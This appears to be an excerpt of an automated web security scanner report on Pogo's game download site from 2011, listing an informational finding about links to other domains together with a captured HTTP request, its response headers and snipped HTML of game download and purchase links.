http://gamecenter.cdn3.oberon-media.com/pogo/exe/mystery_of_the_dragon_prince_84542444-setup.exe?RefId=headernav_fp_shopmenu&origin=pindex_mp_name&genre=New&ln=en&ext=mystery_of_the_dragon_prince_84542444-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/nightmare_adventures_84341681-setup.exe?RefId=headernav_fp_shopmenu&origin=pcat_dl_lnk&genre=New&ln=en&ext=nightmare_adventures_84341681-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/roads_of_rome_2_01545341-setup.exe?RefId=headernav_fp_shopmenu&origin=pcat_dl_lnk&genre=New&ln=en&ext=roads_of_rome_2_01545341-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/slingo_mystery_2_68454245-setup.exe?RefId=headernav_fp_shopmenu&origin=pcat_dl_lnk&genre=New&ln=en&ext=slingo_mystery_2_68454245-setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/zmas_blox_75410444-setup.exe?RefId=headernav_fp_shopmenu&origin=pcat_dl_lnk&genre=New&ln=en&ext=zmas_blox_75410444-setup.exe
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119530827&channel=110184400&RefID=headernav_fp_shopmenu&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119621750&channel=110184400&RefID=headernav_fp_shopmenu&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119622287&channel=110184400&RefID=headernav_fp_shopmenu&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119644253&channel=110184400&RefID=headernav_fp_shopmenu&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119700817&channel=110184400&RefID=headernav_fp_shopmenu&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119717670&channel=110184400&RefID=headernav_fp_shopmenu&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119718230&channel=110184400&RefID=headernav_fp_shopmenu&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119730120&channel=110184400&RefID=headernav_fp_shopmenu&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119735947&channel=110184400&RefID=headernav_fp_shopmenu&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=
https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119761357&channel=110184400&RefID=headernav_fp_shopmenu&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=

Request

GET /Category.aspx?code=1002&genre=New&RefID=headernav_fp_shopmenu&Session=&orign=p_leftbar_catName&ln=en&=0 HTTP/1.1
Host: download-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Content-Length: 60053
Cache-Control: private, max-age=1329
Date: Sun, 09 Jan 2011 02:09:21 GMT
Connection: close

<html>
<head>
<meta name="msvalidate.01" content="F6F676EB374D905262C4FF19D14E715D" />

<meta name="description" content="Download new games at Pogo including Plants vs. Zombies, Mystic Empor
...[SNIP]...
<td style="padding-left: 5px;">

                       <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/chainz_galaxy_68453211-setup.exe?RefId=headernav_fp_shopmenu&origin=pindex_mp_name&genre=New&ln=en&ext=chainz_galaxy_68453211-setup.exe" onclick="omnitureLogDownload('119730120','oberonpogostd','Chainz Galaxy','newGames','1/8/2011 5:32:45 PM')" target="_top"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0" align="middle"></a>
                       <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/chainz_galaxy_68453211-setup.exe?RefId=headernav_fp_shopmenu&origin=pindex_mp_name&genre=New&ln=en&ext=chainz_galaxy_68453211-setup.exe" onclick="omnitureLogDownload('119730120','oberonpogostd','Chainz Galaxy','newGames','1/8/2011 5:32:45 PM')" target="_top" class="txt11b">Try Free</a>
...[SNIP]...
<td style="padding-left: 5px;">

                       <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/cake_mania_to_the_max_83215850-setup.exe?RefId=headernav_fp_shopmenu&origin=pindex_mp_name&genre=New&ln=en&ext=cake_mania_to_the_max_83215850-setup.exe" onclick="omnitureLogDownload('119761357','oberonpogostd','Cake Mania To The Max','newGames','1/8/2011 5:32:45 PM')" target="_top"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0" align="middle"></a>
                       <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/cake_mania_to_the_max_83215850-setup.exe?RefId=headernav_fp_shopmenu&origin=pindex_mp_name&genre=New&ln=en&ext=cake_mania_to_the_max_83215850-setup.exe" onclick="omnitureLogDownload('119761357','oberonpogostd','Cake Mania To The Max','newGames','1/8/2011 5:32:45 PM')" target="_top" class="txt11b">Try Free</a>
...[SNIP]...
<td style="padding-left: 5px;">

                       <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/mystery_of_the_dragon_prince_84542444-setup.exe?RefId=headernav_fp_shopmenu&origin=pindex_mp_name&genre=New&ln=en&ext=mystery_of_the_dragon_prince_84542444-setup.exe" onclick="omnitureLogDownload('119621750','oberonpogostd','The Mystery of the Dragon Prin','newGames','1/8/2011 5:32:45 PM')" target="_top"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0" align="middle"></a>
                       <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/mystery_of_the_dragon_prince_84542444-setup.exe?RefId=headernav_fp_shopmenu&origin=pindex_mp_name&genre=New&ln=en&ext=mystery_of_the_dragon_prince_84542444-setup.exe" onclick="omnitureLogDownload('119621750','oberonpogostd','The Mystery of the Dragon Prin','newGames','1/8/2011 5:32:45 PM')" target="_top" class="txt11b">Try Free</a>
...[SNIP]...
<td valign="top">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/chainz_galaxy_68453211-setup.exe?RefId=headernav_fp_shopmenu&origin=pcat_dl_lnk&genre=New&ln=en&ext=chainz_galaxy_68453211-setup.exe" onclick="omnitureLogDownload('119730120','oberonpogostd','Chainz Galaxy','newGames','1/8/2011 5:32:45 PM')"><img src="/images/games/ChainzGalaxy/ChainzGalaxy81x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td width="90" align="center" valign="bottom" nowrap style="line-height: 20px;"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/chainz_galaxy_68453211-setup.exe?RefId=headernav_fp_shopmenu&origin=pcat_dl_lnk&genre=New&ln=en&ext=chainz_galaxy_68453211-setup.exe" onclick="omnitureLogDownload('119730120','oberonpogostd','Chainz Galaxy','newGames','1/8/2011 5:32:45 PM')"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0">
...[SNIP]...
<br><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/chainz_galaxy_68453211-setup.exe?RefId=headernav_fp_shopmenu&origin=pcat_dl_lnk&genre=New&ln=en&ext=chainz_galaxy_68453211-setup.exe" onclick="omnitureLogDownload('119730120','oberonpogostd','Chainz Galaxy','newGames','1/8/2011 5:32:45 PM')" class="txt11b">Try Free</a>
...[SNIP]...
<td width="60" align="center" valign="bottom" nowrap style="line-height: 20px;"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119730120&channel=110184400&RefID=headernav_fp_shopmenu&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0">
...[SNIP]...
<br><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119730120&channel=110184400&RefID=headernav_fp_shopmenu&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=" class="txt11b">Buy</a>
...[SNIP]...
<td valign="top">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/cake_mania_to_the_max_83215850-setup.exe?RefId=headernav_fp_shopmenu&origin=pcat_dl_lnk&genre=New&ln=en&ext=cake_mania_to_the_max_83215850-setup.exe" onclick="omnitureLogDownload('119761357','oberonpogostd','Cake Mania To The Max','newGames','1/8/2011 5:32:45 PM')"><img src="/images/games/CakeManiaToTheMax/CakeManiaToTheMax81x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td width="90" align="center" valign="bottom" nowrap style="line-height: 20px;"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/cake_mania_to_the_max_83215850-setup.exe?RefId=headernav_fp_shopmenu&origin=pcat_dl_lnk&genre=New&ln=en&ext=cake_mania_to_the_max_83215850-setup.exe" onclick="omnitureLogDownload('119761357','oberonpogostd','Cake Mania To The Max','newGames','1/8/2011 5:32:45 PM')"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0">
...[SNIP]...
<br><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/cake_mania_to_the_max_83215850-setup.exe?RefId=headernav_fp_shopmenu&origin=pcat_dl_lnk&genre=New&ln=en&ext=cake_mania_to_the_max_83215850-setup.exe" onclick="omnitureLogDownload('119761357','oberonpogostd','Cake Mania To The Max','newGames','1/8/2011 5:32:45 PM')" class="txt11b">Try Free</a>
...[SNIP]...
<td width="60" align="center" valign="bottom" nowrap style="line-height: 20px;"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119761357&channel=110184400&RefID=headernav_fp_shopmenu&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0">
...[SNIP]...
<br><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119761357&channel=110184400&RefID=headernav_fp_shopmenu&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=" class="txt11b">Buy</a>
...[SNIP]...
<td valign="top">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/mystery_of_the_dragon_prince_84542444-setup.exe?RefId=headernav_fp_shopmenu&origin=pcat_dl_lnk&genre=New&ln=en&ext=mystery_of_the_dragon_prince_84542444-setup.exe" onclick="omnitureLogDownload('119621750','oberonpogostd','The Mystery of the Dragon Prin','newGames','1/8/2011 5:32:45 PM')"><img src="/images/games/TheMysteryoftheDragonPrince/TheMysteryoftheDragonPrince81x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td width="90" align="center" valign="bottom" nowrap style="line-height: 20px;"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/mystery_of_the_dragon_prince_84542444-setup.exe?RefId=headernav_fp_shopmenu&origin=pcat_dl_lnk&genre=New&ln=en&ext=mystery_of_the_dragon_prince_84542444-setup.exe" onclick="omnitureLogDownload('119621750','oberonpogostd','The Mystery of the Dragon Prin','newGames','1/8/2011 5:32:45 PM')"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0">
...[SNIP]...
<br><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/mystery_of_the_dragon_prince_84542444-setup.exe?RefId=headernav_fp_shopmenu&origin=pcat_dl_lnk&genre=New&ln=en&ext=mystery_of_the_dragon_prince_84542444-setup.exe" onclick="omnitureLogDownload('119621750','oberonpogostd','The Mystery of the Dragon Prin','newGames','1/8/2011 5:32:45 PM')" class="txt11b">Try Free</a>
...[SNIP]...
<td width="60" align="center" valign="bottom" nowrap style="line-height: 20px;"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119621750&channel=110184400&RefID=headernav_fp_shopmenu&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0">
...[SNIP]...
<br><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119621750&channel=110184400&RefID=headernav_fp_shopmenu&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=" class="txt11b">Buy</a>
...[SNIP]...
<td valign="top">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/nightmare_adventures_84341681-setup.exe?RefId=headernav_fp_shopmenu&origin=pcat_dl_lnk&genre=New&ln=en&ext=nightmare_adventures_84341681-setup.exe" onclick="omnitureLogDownload('119644253','oberonpogostd','Nightmare Adventures','newGames','1/8/2011 5:32:45 PM')"><img src="/images/games/NightmareAdventures/NightmareAdventures81x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td width="90" align="center" valign="bottom" nowrap style="line-height: 20px;"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/nightmare_adventures_84341681-setup.exe?RefId=headernav_fp_shopmenu&origin=pcat_dl_lnk&genre=New&ln=en&ext=nightmare_adventures_84341681-setup.exe" onclick="omnitureLogDownload('119644253','oberonpogostd','Nightmare Adventures','newGames','1/8/2011 5:32:45 PM')"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0">
...[SNIP]...
<br><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/nightmare_adventures_84341681-setup.exe?RefId=headernav_fp_shopmenu&origin=pcat_dl_lnk&genre=New&ln=en&ext=nightmare_adventures_84341681-setup.exe" onclick="omnitureLogDownload('119644253','oberonpogostd','Nightmare Adventures','newGames','1/8/2011 5:32:45 PM')" class="txt11b">Try Free</a>
...[SNIP]...
<td width="60" align="center" valign="bottom" nowrap style="line-height: 20px;"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119644253&channel=110184400&RefID=headernav_fp_shopmenu&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0">
...[SNIP]...
<br><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119644253&channel=110184400&RefID=headernav_fp_shopmenu&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=" class="txt11b">Buy</a>
...[SNIP]...
<td valign="top">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/frutti_for_newbies_2_56454201-setup.exe?RefId=headernav_fp_shopmenu&origin=pcat_dl_lnk&genre=New&ln=en&ext=frutti_for_newbies_2_56454201-setup.exe" onclick="omnitureLogDownload('119530827','oberonpogostd','Frutti for Newbies 2','newGames','1/8/2011 5:32:45 PM')"><img src="/images/games/FruttiforNewbies2/FruttiforNewbies281x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td width="90" align="center" valign="bottom" nowrap style="line-height: 20px;"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/frutti_for_newbies_2_56454201-setup.exe?RefId=headernav_fp_shopmenu&origin=pcat_dl_lnk&genre=New&ln=en&ext=frutti_for_newbies_2_56454201-setup.exe" onclick="omnitureLogDownload('119530827','oberonpogostd','Frutti for Newbies 2','newGames','1/8/2011 5:32:45 PM')"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0">
...[SNIP]...
<br><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/frutti_for_newbies_2_56454201-setup.exe?RefId=headernav_fp_shopmenu&origin=pcat_dl_lnk&genre=New&ln=en&ext=frutti_for_newbies_2_56454201-setup.exe" onclick="omnitureLogDownload('119530827','oberonpogostd','Frutti for Newbies 2','newGames','1/8/2011 5:32:45 PM')" class="txt11b">Try Free</a>
...[SNIP]...
<td width="60" align="center" valign="bottom" nowrap style="line-height: 20px;"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119530827&channel=110184400&RefID=headernav_fp_shopmenu&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0">
...[SNIP]...
<br><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119530827&channel=110184400&RefID=headernav_fp_shopmenu&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=" class="txt11b">Buy</a>
...[SNIP]...
<td valign="top">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/jewel_quest_mysteries_bundle_68450411-setup.exe?RefId=headernav_fp_shopmenu&origin=pcat_dl_lnk&genre=New&ln=en&ext=jewel_quest_mysteries_bundle_68450411-setup.exe" onclick="omnitureLogDownload('119718230','oberonpogostd','Jewel Quest Mysteries bundle','newGames','1/8/2011 5:32:45 PM')"><img src="/images/games/jewel_quest_mysteries_bundle/jewel_quest_mysteries_bundle81x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td width="90" align="center" valign="bottom" nowrap style="line-height: 20px;"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/jewel_quest_mysteries_bundle_68450411-setup.exe?RefId=headernav_fp_shopmenu&origin=pcat_dl_lnk&genre=New&ln=en&ext=jewel_quest_mysteries_bundle_68450411-setup.exe" onclick="omnitureLogDownload('119718230','oberonpogostd','Jewel Quest Mysteries bundle','newGames','1/8/2011 5:32:45 PM')"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0">
...[SNIP]...
<br><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/jewel_quest_mysteries_bundle_68450411-setup.exe?RefId=headernav_fp_shopmenu&origin=pcat_dl_lnk&genre=New&ln=en&ext=jewel_quest_mysteries_bundle_68450411-setup.exe" onclick="omnitureLogDownload('119718230','oberonpogostd','Jewel Quest Mysteries bundle','newGames','1/8/2011 5:32:45 PM')" class="txt11b">Try Free</a>
...[SNIP]...
<td width="60" align="center" valign="bottom" nowrap style="line-height: 20px;"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119718230&channel=110184400&RefID=headernav_fp_shopmenu&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0">
...[SNIP]...
<br><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119718230&channel=110184400&RefID=headernav_fp_shopmenu&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=" class="txt11b">Buy</a>
...[SNIP]...
<td valign="top">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/roads_of_rome_2_01545341-setup.exe?RefId=headernav_fp_shopmenu&origin=pcat_dl_lnk&genre=New&ln=en&ext=roads_of_rome_2_01545341-setup.exe" onclick="omnitureLogDownload('119735947','oberonpogostd','Roads of Rome 2','newGames','1/8/2011 5:32:45 PM')"><img src="/images/games/RoadsofRome2/RoadsofRome281x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td width="90" align="center" valign="bottom" nowrap style="line-height: 20px;"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/roads_of_rome_2_01545341-setup.exe?RefId=headernav_fp_shopmenu&origin=pcat_dl_lnk&genre=New&ln=en&ext=roads_of_rome_2_01545341-setup.exe" onclick="omnitureLogDownload('119735947','oberonpogostd','Roads of Rome 2','newGames','1/8/2011 5:32:45 PM')"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0">
...[SNIP]...
<br><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/roads_of_rome_2_01545341-setup.exe?RefId=headernav_fp_shopmenu&origin=pcat_dl_lnk&genre=New&ln=en&ext=roads_of_rome_2_01545341-setup.exe" onclick="omnitureLogDownload('119735947','oberonpogostd','Roads of Rome 2','newGames','1/8/2011 5:32:45 PM')" class="txt11b">Try Free</a>
...[SNIP]...
<td width="60" align="center" valign="bottom" nowrap style="line-height: 20px;"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119735947&channel=110184400&RefID=headernav_fp_shopmenu&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0">
...[SNIP]...
<br><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119735947&channel=110184400&RefID=headernav_fp_shopmenu&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=" class="txt11b">Buy</a>
...[SNIP]...
<td valign="top">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/kaptain_brawe_53056849-setup.exe?RefId=headernav_fp_shopmenu&origin=pcat_dl_lnk&genre=New&ln=en&ext=kaptain_brawe_53056849-setup.exe" onclick="omnitureLogDownload('119622287','oberonpogostd','Kaptain Brawe','newGames','1/8/2011 5:32:45 PM')"><img src="/images/games/KaptainBrawe/KaptainBrawe81x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td width="90" align="center" valign="bottom" nowrap style="line-height: 20px;"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/kaptain_brawe_53056849-setup.exe?RefId=headernav_fp_shopmenu&origin=pcat_dl_lnk&genre=New&ln=en&ext=kaptain_brawe_53056849-setup.exe" onclick="omnitureLogDownload('119622287','oberonpogostd','Kaptain Brawe','newGames','1/8/2011 5:32:45 PM')"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0">
...[SNIP]...
<br><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/kaptain_brawe_53056849-setup.exe?RefId=headernav_fp_shopmenu&origin=pcat_dl_lnk&genre=New&ln=en&ext=kaptain_brawe_53056849-setup.exe" onclick="omnitureLogDownload('119622287','oberonpogostd','Kaptain Brawe','newGames','1/8/2011 5:32:45 PM')" class="txt11b">Try Free</a>
...[SNIP]...
<td width="60" align="center" valign="bottom" nowrap style="line-height: 20px;"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119622287&channel=110184400&RefID=headernav_fp_shopmenu&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0">
...[SNIP]...
<br><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119622287&channel=110184400&RefID=headernav_fp_shopmenu&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=" class="txt11b">Buy</a>
...[SNIP]...
<td valign="top">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/zmas_blox_75410444-setup.exe?RefId=headernav_fp_shopmenu&origin=pcat_dl_lnk&genre=New&ln=en&ext=zmas_blox_75410444-setup.exe" onclick="omnitureLogDownload('119717670','oberonpogostd','Xmas Blox','newGames','1/8/2011 5:32:45 PM')"><img src="/images/games/XmasBlox/XmasBlox81x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td width="90" align="center" valign="bottom" nowrap style="line-height: 20px;"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/zmas_blox_75410444-setup.exe?RefId=headernav_fp_shopmenu&origin=pcat_dl_lnk&genre=New&ln=en&ext=zmas_blox_75410444-setup.exe" onclick="omnitureLogDownload('119717670','oberonpogostd','Xmas Blox','newGames','1/8/2011 5:32:45 PM')"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0">
...[SNIP]...
<br><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/zmas_blox_75410444-setup.exe?RefId=headernav_fp_shopmenu&origin=pcat_dl_lnk&genre=New&ln=en&ext=zmas_blox_75410444-setup.exe" onclick="omnitureLogDownload('119717670','oberonpogostd','Xmas Blox','newGames','1/8/2011 5:32:45 PM')" class="txt11b">Try Free</a>
...[SNIP]...
<td width="60" align="center" valign="bottom" nowrap style="line-height: 20px;"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119717670&channel=110184400&RefID=headernav_fp_shopmenu&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0">
...[SNIP]...
<br><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119717670&channel=110184400&RefID=headernav_fp_shopmenu&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=" class="txt11b">Buy</a>
...[SNIP]...
<td valign="top">

                                   <a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/slingo_mystery_2_68454245-setup.exe?RefId=headernav_fp_shopmenu&origin=pcat_dl_lnk&genre=New&ln=en&ext=slingo_mystery_2_68454245-setup.exe" onclick="omnitureLogDownload('119700817','oberonpogostd','Slingo Mystery 2','newGames','1/8/2011 5:32:45 PM')"><img src="/images/games/SlingoMystery2/SlingoMystery281x46.gif" alt="" width="81" height="46" border="0">
...[SNIP]...
<td width="90" align="center" valign="bottom" nowrap style="line-height: 20px;"><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/slingo_mystery_2_68454245-setup.exe?RefId=headernav_fp_shopmenu&origin=pcat_dl_lnk&genre=New&ln=en&ext=slingo_mystery_2_68454245-setup.exe" onclick="omnitureLogDownload('119700817','oberonpogostd','Slingo Mystery 2','newGames','1/8/2011 5:32:45 PM')"><img src="/Graphics/Pogo/en/o_pogo/buttonDownload.gif" alt="" width="15" height="15" border="0">
...[SNIP]...
<br><a href="http://gamecenter.cdn3.oberon-media.com/pogo/exe/slingo_mystery_2_68454245-setup.exe?RefId=headernav_fp_shopmenu&origin=pcat_dl_lnk&genre=New&ln=en&ext=slingo_mystery_2_68454245-setup.exe" onclick="omnitureLogDownload('119700817','oberonpogostd','Slingo Mystery 2','newGames','1/8/2011 5:32:45 PM')" class="txt11b">Try Free</a>
...[SNIP]...
<td width="60" align="center" valign="bottom" nowrap style="line-height: 20px;"><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119700817&channel=110184400&RefID=headernav_fp_shopmenu&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate="><img src="/Graphics/Pogo/en/o_pogo/buttonBuy.gif" alt="" width="15" height="15" border="0">
...[SNIP]...
<br><a href="https://www.oberon-media.com/PaymentServices/PogoBill/PlaceOrder.aspx?code=119700817&channel=110184400&RefID=headernav_fp_shopmenu&orign=pcat_mp_lnk&ln=en&BillingCountry=US&lc=en&gameCodeDate=" class="txt11b">Buy</a>
...[SNIP]...

16.20. http://download-games.pogo.com/Category.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://download-games.pogo.com
Path:	/Category.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://download-games.pogo.com/Category.aspx?code=1000&refId=Hot_Sellers

The response contains the following links to other domains:

http://gamecenter.cdn3.oberon-media.com/pogo/exe/Book_Worm-Setup.exe?RefId=Hot_Sellers&origin=pcat_dl_lnk&genre=Strategy&ln=en&ext=Book_Worm-Setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/Book_Worm-Setup.exe?RefId=Hot_Sellers&origin=pindex_mp_name&genre=Strategy&ln=en&ext=Book_Worm-Setup.exe
http://gamecenter.cdn3.oberon-media.com/pogo/exe/Mahjongg_dimensions_51548812-setup.exe?RefId=Hot_Sellers&origin=pcat_dl_lnk&genre=Puzzle&ln=en&ext=Mahjongg_dimensions_51548812-setup.exe
